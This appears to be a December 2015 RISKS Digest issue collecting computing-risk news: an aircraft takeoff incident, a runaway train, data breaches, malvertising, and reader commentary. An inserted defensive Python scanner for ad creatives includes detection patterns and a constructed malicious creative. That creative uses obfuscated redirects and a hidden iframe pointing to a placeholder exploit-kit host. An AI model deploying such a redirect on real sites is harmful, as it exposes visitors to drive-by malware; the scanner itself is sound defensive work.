A Qatar Airways Boeing 777 traveling from Miami to Doha struck airport lights during takeoff and suffered a 46-cm tear in the fuselage, thanks in part to a pilot zooming in too far on a tablet computer. Flight QR778 left Miami on September 15th, but as it took off it hit airport landing lights. On arrival the plane was found to have suffered "a 46 cm tear in the fuselage behind the rear cargo door which breached the pressure vessel... numerous dents and scratches in the external airframe with 18 square meters of damaged skin." Inspection also found "90 external individual areas of damage requiring assessment and rectification [and] some damage to a metal guard on the left landing gear." A Qatar Civil Aviation Authority (QCAA) report on the incident suggests the crew were not familiar with the airport, so when the First Officer decided to take off from a point 411 m down the runway, the choice was queried, but "The commander made a hand gesture and said something which he thought was seeking reassurance from the crew that everything was OK." http://www.theregister.co.uk/2015/12/11/tablet_computer_zoom_snafu_saw_plane_fly_13_hours_with_46cm_hole/ Gabriel Goldberg, Computers and Publishing, Inc. gabe@gabegold.com 3401 Silver Maple Place, Falls Church, VA 22042 (703) 204-0433
An MBTA train from Braintree ran through the next four stops after the driver got out to attend to a signal problem. It was stopped just after the North Quincy station, when power to the third rail was cut off. [PGN] https://www.bostonglobe.com/metro/2015/12/10/red-line-train-leaves-station-without-operator/L5NzTcDEX8dMQCQLvC7UBN/story.html The story is actually much more complicated. Controllers had to manually get trains that were ahead of the runaway to express out of the Braintree section onto the Red Line section, so that power could be shut off on the entire Braintree section. This is a fascinating hands-on dynamic systemic solution to an apparently unplanned event. My guess is that it might even suggest some systemic changes! [PGN] Eric Moskowitz, LATER: A call, then a scramble to stop runaway train https://www.bostonglobe.com/metro/2015/12/11/call-then-scramble-stop-runaway-train/3HvcszljJaLlANPPX5b6wN/story.html
Jack Ewing, *The New York Times*, 11 Dec 2015 http://www.nytimes.com/2015/12/11/business/international/vw-emissions-scandal.html In its most detailed explanation of what led to the scandal, the German automaker cited a chain of errors that were allowed to happen. ["There was a tolerance for breaking the rules."—Hans-Dieter Pötsch, chair of VW's Supervisory Board.]
Phillip Rogaway, The Moral Character of Cryptographic Work http://web.cs.ucdavis.edu/~rogaway/papers/moral.html This essay attempts to ground cryptography within larger political and ethical contexts, which I am sure will be of interest to the general population of RISKS readers. A side note: Google appears to be (in some instances) not providing users direct links to articles; Google instead provides links to Google with search terms. Have others noticed this? And if so, can anyone speculate as to why?
"He likened the danger posed by modern governments' growing surveillance capabilities to the threat of nuclear warfare in the 1950s, and called upon scientists to step up and speak out today, as they did then. I spoke to Rogaway about why cryptographers fail to see their work in moral terms, and the emerging link between encryption and terrorism in the national conversation. A transcript of our conversation appears below, lightly edited for concision and clarity." http://www.theatlantic.com/technology/archive/2015/12/the-moral-failure-of-computer-science/420012/
http://www.bostonglobe.com/business/2015/12/14/twitter-says-was-target-state-sponsored-hack/aqmmGtUBsOwYDbSePVyChJ/story.html
http://www.huffingtonpost.com/larry-magid/europe-could-kick-majorit_b_8774742.html European policymakers are considering a draft of the European Data Protection Regulation that would prohibit teens under 16 from participating in social media without parental consent. Up until this point, the draft Regulation set the age at 13, which is consistent with laws and practices around the world.
8 Dec 2015: MaineGeneral https://www.mainegeneral.org/Pages/Home.aspx went public about this breach. 13 Nov 2015: the health care provider was notified by the FBI of evidence of a breach. They investigated & confirmed it, but do not have full details yet. For some patients, info taken includes real identity, address, phone, date of birth, and emergency contact phone. They do not yet know how many, out of their approx. 180,000 patients, but the info dates back to at least June 2009. Some employees were also affected, with similar info. So far there is no evidence that credit or financial info, Social Security numbers, or driver's license numbers were taken. MaineGeneral is offering impacted persons access to one year of free credit monitoring and identity restoration services. https://www.mainegeneral.org/news/statement-regarding-mainegenerals-recent-cyber-attack http://www.govinfosecurity.com/fbi-detects-another-healthcare-cyberattack-a-8736
... Under the federal law known as HIPAA, it's illegal for health care providers to share patients' treatment information without their permission. The Office for Civil Rights, the arm of the Department of Health and Human Services responsible for enforcing the law, receives more than 30,000 reports about privacy violations each year. The bulk of the government's enforcement—and the public's attention -- has focused on a small number of splashy cases in which hackers or thieves have accessed the health data of large groups of people. But the damage done in these mass breaches has been mostly hypothetical, with much information exposed, but little exploited. https://www.propublica.org/article/small-scale-violations-of-medical-privacy-often-cause-the-most-harm
CloudLock https://www.cloudlock.com/ analyzed 10 million users, 1 billion files, and 91,000 applications to survey risk across multiple industries. You have to register with them to download their report. http://go.cloudlock.com/ebook-q3-2015-cybersecurity-report.html They found that on average only 5% of companies bother with password and other credential protection. K-12 is worst, at 1%. Retail is "best," at 8%. For the breakdown of other sectors, see the Help Net Security link. http://www.net-security.org/secworld.php?id214 99% of files in the financial services industry that can be found by anyone who can find a link, or locate them via search engines, can be attributed to exposure by 1% of their users. The overall average across industries, in the article, is 74%. Health Care is most secure in that department. Manufacturing shows the least concern for protecting PII such as Social Security numbers, IDs, dates of birth, etc. Al Mac comments: Someone had to be in last place. I would have liked Critical Infrastructure to be a category, since I am now reading "Lights Out" by Ted Koppel. We have known for decades that security for our electric grid, both cyber security and physical security, is pretty dismal. Mainstream news media is now giving more attention to this topic thanks to Ted Koppel's reputation as a first-class messenger. The electric grid can be taken down for all of the USA, and take years to repair. An enormous volume of our civilization is dependent upon it: water, transportation, communication, restocking groceries, hospitals. Millions will die. It is not *if* ISIS can do it, but when they will do it.
FYI—This is why you should *turn Javascript off* by default & remove all *add-ons* & *plug-ins*, including Java, Flash, video players, etc. With Javascript turned off, you don't even need an ad-blocker. Leaving Javascript turned on in your browser is the equivalent of leaving all of your power tools outside your house, so that a burglar doesn't even need to bring his/her own when attacking your house. It's actually even worse than that; you've left a remote-controlled *robot* outside your home that the burglar can take over and use to attack your home while he/she is sitting in the comfort of his/her home.

http://www.wired.com/2015/12/hacker-lexicon-malvertising-the-hack-that-infects-computers-without-a-click/ Joseph Cox, *WiReD*, 9 Dec 2015 Hacker Lexicon: Malvertising, the Hack That Infects Computers Without a Click

Malvertising is when hackers buy ad space on a legitimate website, and, as the name suggests, upload malicious advertisements designed to hack site visitors' computers. The news page looked perfectly innocent. Apart from the reams of celebrity gossip stories and throw-away magazine layout, nothing about the website for UK news site *The Daily Mail* seemed particularly malicious. But, if you visited the site in October, you might have fallen victim to a sophisticated hacking campaign without even realizing it. In the background of *The Daily Mail*, third-party advertisements were surreptitiously and automatically redirecting readers to powerful exploit kits, designed to install malware on their computers. This is the booming trade of malvertising: where cybercriminals rent out ads on sketchy corners of the Internet and popular sites alike, in order to infect the computers of as many people as possible. Plenty of Popular Sites Have Been Targeted [...] How Malvertising Works [...] How Can Malvertising Be Stopped? [...]
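The WiReD excerpt describes the mechanism (a third-party creative that silently forces the reader's browser to an exploit-kit landing page), and Baker's advice addresses it from the reader's side. The publisher's side is a pre-screen of the creative before it is served. The following is an added illustration, not code from RISKS, WiReD, or any ad network: a static check that flags the primitives such a creative needs (forced top-level navigation, meta refresh, unsandboxed or off-list iframes, script from unapproved hosts, decoding helpers typical of obfuscated payloads). The two sample creatives, the allowed-host list, and all hostnames are constructed for the example.

```python
"""Static pre-screen for third-party ad creatives (added example).

Heuristic check a publisher or ad network could run on a creative before
serving it. It looks for the building blocks of a drive-by redirect, not
for any specific exploit kit. Sample creatives and hosts are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline-script idioms a banner has no business using: navigating the
# parent page, or hiding what it builds/fetches behind decoding calls.
SUSPICIOUS_JS = {
    "top_navigation": re.compile(r"\b(?:top|parent)\s*\.\s*location\b"),
    "location_replace": re.compile(r"\blocation\s*\.\s*(?:replace|assign)\s*\("),
    "obfuscation": re.compile(r"\b(?:eval|unescape|atob|String\.fromCharCode)\s*\("),
    "iframe_injection": re.compile(r"createElement\s*\(\s*['\"]iframe['\"]\s*\)"),
}


class CreativeParser(HTMLParser):
    """Collect scripts, iframes and meta-refresh tags from a creative."""

    def __init__(self):
        super().__init__()
        self.inline_scripts = []   # text of each <script>...</script>
        self.script_srcs = []      # src of each external <script>
        self.iframes = []          # attribute dict of each <iframe>
        self.meta_refresh = False
        self._buf = None           # non-None while inside <script>

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}   # valueless attr -> ""
        if tag == "script":
            self._buf = []
            if a.get("src"):
                self.script_srcs.append(a["src"])
        elif tag == "iframe":
            self.iframes.append(a)
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.meta_refresh = True

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            body = "".join(self._buf).strip()
            if body:
                self.inline_scripts.append(body)
            self._buf = None


def _host(url):
    return (urlparse(url).hostname or "").lower()


def scan_creative(html, allowed_hosts):
    """Return a list of findings; an empty list means nothing suspicious."""
    p = CreativeParser()
    p.feed(html)
    p.close()
    findings = []
    if p.meta_refresh:
        findings.append("meta refresh redirect")
    for src in p.script_srcs:
        h = _host(src)
        if h not in allowed_hosts:
            findings.append(f"external script from unapproved host {h or '<relative>'}")
    for body in p.inline_scripts:
        for name, rx in SUSPICIOUS_JS.items():
            if rx.search(body):
                findings.append(f"inline script: {name}")
    for f in p.iframes:
        h = _host(f.get("src", ""))
        label = h or "<relative>"
        if "sandbox" not in f:
            findings.append(f"iframe to {label} without sandbox attribute")
        elif "allow-top-navigation" in f["sandbox"]:
            findings.append(f"iframe to {label} sandbox permits top navigation")
        if h and h not in allowed_hosts:
            findings.append(f"iframe to unapproved host {h}")
    return findings


# Constructed samples; every hostname is a placeholder.
ALLOWED_HOSTS = {"cdn.example-ads.net"}

BENIGN_CREATIVE = """
<div class="ad">
  <a href="https://shop.example.com/sale"><img src="https://cdn.example-ads.net/banner.png" alt="Sale"></a>
  <script src="https://cdn.example-ads.net/track.js"></script>
  <iframe sandbox="allow-scripts" src="https://cdn.example-ads.net/frame.html"></iframe>
</div>
"""

MALICIOUS_CREATIVE = """
<div>
  <img src="https://cdn.example-ads.net/banner.png">
  <script>
    var k = unescape("%68%74%74%70%73%3a%2f%2f");
    if (!document.cookie.match(/seen/)) { top.location = k + "exploit-kit.example.invalid/gate.php"; }
  </script>
  <iframe src="https://exploit-kit.example.invalid/lander" width="1" height="1"></iframe>
</div>
"""

if __name__ == "__main__":
    for name, html in [("benign", BENIGN_CREATIVE), ("malicious", MALICIOUS_CREATIVE)]:
        print(name, scan_creative(html, ALLOWED_HOSTS) or ["clean"])
```

The check is deliberately conservative: an honest banner that needs `allow-top-navigation` or an external script host gets flagged for human review rather than silently passed, which is the trade-off a publisher makes once it accepts that the ad slot is executing someone else's code in its readers' browsers.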
NNSquad http://www.dslreports.com/shownews/ATT-Fools-Entire-Media-With-Giant-Gigabit-Fiber-Bluff-135848 In reality, AT&T has consistently been cutting back its fixed-line investment budget and CAPEX to focus on more profitable wireless (read: usage capped) broadband. There's no budget for the kind of "real" fiber build AT&T's press release implies. In fact, while AT&T pats itself on the back for this latest build, it has been consistently trying to figure out how it can gut regulations in order to hang up on millions of DSL users it doesn't want to upgrade. And while AT&T this week promised its over-hyped fiber build will someday reach 14 million residential and commercial locations, they didn't give a timeline for this accomplishment. That means AT&T technically could be winding up this not-particularly ambitious attempt to cherry pick the nation's high-end development communities and university student condos—by 2030 or so. We're potentially talking about only a few hundred thousand lines per year, many at universities. Exactly. U-verse is fiber to the terminal, with the final leg almost always provided over copper and using DSL-technologies. What AT&T is doing is claiming a massive "fiber build-out" when in practice all they're mostly doing is providing a relatively few direct fiber connections to those terminals in special cases. But are they really planning to spend a pile of money deploying fiber (on poles and buried) to replace all that copper that serves most homes and businesses in their service areas? If you think so, there's a bridge across the East River in New York you might be interested in buying.
Oopsy: NY State Health Insurance Website Let You Download Other Users' Private Info (Gothamist via NNSquad) http://gothamist.com/2015/12/10/thanks_obama.php For an unknown period of time, anyone who logged onto the New York State health plan website had the ability to download a range of sensitive, private information belonging to other users. The incredible glitch was discovered by Robert Parks, a cofounder of Oyster, after he received an email last Saturday notifying him that he had a message from the New York State of Health website. ... I'll add a "don't be a jerk" message to the author of that article, because a security flaw in a NY State site is not the responsibility of Obamacare/ACA, but of idiots in New York.
I haven't seen any mention of this before so would like to learn more. There is a risk of the supposedly decentralized Internet relying on hierarchical naming, addressing and certificates. But that's a deeper topic. http://www.ibtimes.co.uk/john-mcafee-massive-ddos-attack-internet-was-smartphone-botnet-popular-app-1532993
For the second month in a row, a Patch Tuesday Outlook update raises havoc Woody Leonhard, InfoWorld, 9 Dec 2015 http://www.infoworld.com/article/3013219/microsoft-windows/microsoft-pulls-botched-patch-kb-3114409-that-triggered-problems-with-outlook-2010.html selected text: Microsoft's Patch Tuesday update KB 3114409, intended to help admins keep Outlook 2010 from starting in safe mode, has in fact done the opposite. Many Outlook 2010 customers report that installing KB 3114409 forces Outlook to start in safe mode. And you should reflect on how a patch this destructive ever made it through internal testing.
Woody Leonhard, InfoWorld, 9 Dec 2015 A look at recent patch lists for IE and Edge hints that many of IE's warts will continue to haunt us http://www.infoworld.com/article/3012987/microsoft-windows/microsoft-edge-has-inherited-many-of-internet-explorers-security-holes.html selected text: We're all anxiously awaiting the day that Windows 10's new Edge browser becomes usable. That hasn't happened yet, but it will some day next year. But looking at yesterday's Patch Tuesday announcement and the one for November has me wondering how much of this improved security is new bananas -- and how much is built on a rotten old foundation. The reason for my skepticism: Common Vulnerabilities and Exposures (CVEs). Each CVE entry is supposed to identify a unique security hole. The overlap between Internet Explorer CVEs and Edge CVEs shows that many security problems in IE have been inherited by Edge.
A hotel cannot examine names of potential guests and reject them based on race, the authors say, but that is common with short-term home rentals. http://www.nytimes.com/2015/12/12/business/discrimination-by-airbnb-hosts-is-widespread-report-says.html
Stop slouching over that tiny screen. It's bad for your self-esteem. http://www.nytimes.com/2015/12/13/opinion/sunday/your-iphone-is-ruining-your-posture-and-your-mood.html
FYI—We've got the kids playing with matches in the barn again—H. Baker "Mommy, please tell me again, how did World War I begin?" http://www.nytimes.com/2015/11/27/opinion/world-war-iii.html "Anything that has a computer anywhere on earth can be stopped or taken over" "Stuxnet was a game changer. The Internet became a much more dangerous place after that, because almost literally everybody started to say the gloves are off now." "If we are under attack, you can't just try to catch every arrow. You have to take care of the person shooting the arrows at you." [Assuming that you know or can find out who's shooting at you.] "Part of the problem is that there are so many senior people in the government, especially coming out of the political world, that just don't understand enough about the technology. They really are remarkably uninformed."
With regard to "Students who use computers very frequently at school do a lot worse in most learning outcomes, even after accounting for social background and student demographics": See also my post in 28.57's "Re: As We Age, Smartphones Don't Make Us Stupid ... (LW, RISKS 28.56)" where I detailed my similar experience in a university course.
I stopped voting in 2006 and assumed, because of repeated warnings printed on sample ballots, that my name would be purged from the voting rolls if I failed to vote in three consecutive elections. Three consecutive elections went by and I was still getting election junk mail, so I phoned the office of the Registrar of Voters, explained that I hadn't voted in the past three elections, did not intend to vote in future elections, and requested that my name be removed from the voting rolls. They assured me they'd take care of it. Two more elections passed, and despite a few more phone calls, I was still getting election junk mail. So I took the long bus trip out to the Registrar's office and they had me fill out a form requesting that my name be removed from the rolls. Problem solved? Not at all. It took me three more years of repeated requests before they finally removed my name from the rolls and the junk mail stopped coming. I had several reasons for wanting my name off the rolls, including the reduction of junk mail, a vague suspicion that when elections officials were caught manufacturing "phantom votes," it would have been relatively easy for them to have used the names of people who were registered but hadn't voted, and that I thought it inappropriate for me, as a non-voter and an election boycott advocate, to remain a registered voter. Learning about the political dossiers kept on every US voter feels like a sort of vindication to me: for privacy issues alone, my struggle to get unregistered was well worth the time and effort it cost.
It seems that the designers of autonomous vehicles are finally encountering what every new driver should realize early on: Operating a vehicle, even in an urban environment, is the easy part; but driving is really about teamwork.
When my daughter was about 8, she used to play a lot in an MRPG which enabled players to earn "game money" by meeting challenges, and to use it to buy stuff for their avatar. Game money could also be received at the game's bank by redeeming coupons which were handed out in some stores when buying certain children's products (clothes, toys etc.) for real money. My daughter usually spent all her earnings on shopping sprees, so she never had more than 1000 game coins. One day I noticed she suddenly had 32,000 coins; when asked how she got them, she said "from the Bank!". It seems that she just got into Google and typed "where can I get coupon codes for <Game name>"; it brought her to a site of young hackers. Actually, they did not do much hacking: some kids just filmed themselves playing the game (they did not even know about screen capture) and posted the clips on YouTube; my daughter simply stopped the video and copied the codes! Amazingly, the game accepted these. I'm still waiting for a knock on my door by FBI agents who'd come to inquire who at this address had broken into the Pentagon...
"Many children will have an active interest in coding, spend a lot of time online and have independent learning materials. These are all signs of a healthy and positive interest in computing. "The UK needs as many people interested in coding as possible. Coding and programming are extremely valuable skills and if your child has an interest you should actively encourage them to do so - but in a lawful way." I suggest people visit the actual web site; it doesn't say any such thing [as suggested by Lauren].
FYI—And what % of parents can realistically follow this advice: "If a young person is showing some of these signs try and have a conversation with them about their online activities. This will allow you to assess their computer knowledge proficiency so you can understand what they are doing, explain the consequences of cyber crime and help them make the right choices." Perhaps Eric Schmidt's plan to destroy the First Amendment using AI can also detect/prevent your child's (or your own) cyber "pre-crime": http://www.nytimes.com/2015/12/07/opinion/eric-schmidt-on-how-to-build-a-better-web.html http://oomlout.co.uk/blogs/news/79367233-national-crime-agency-lists-daft-cyber-crime-warning-signs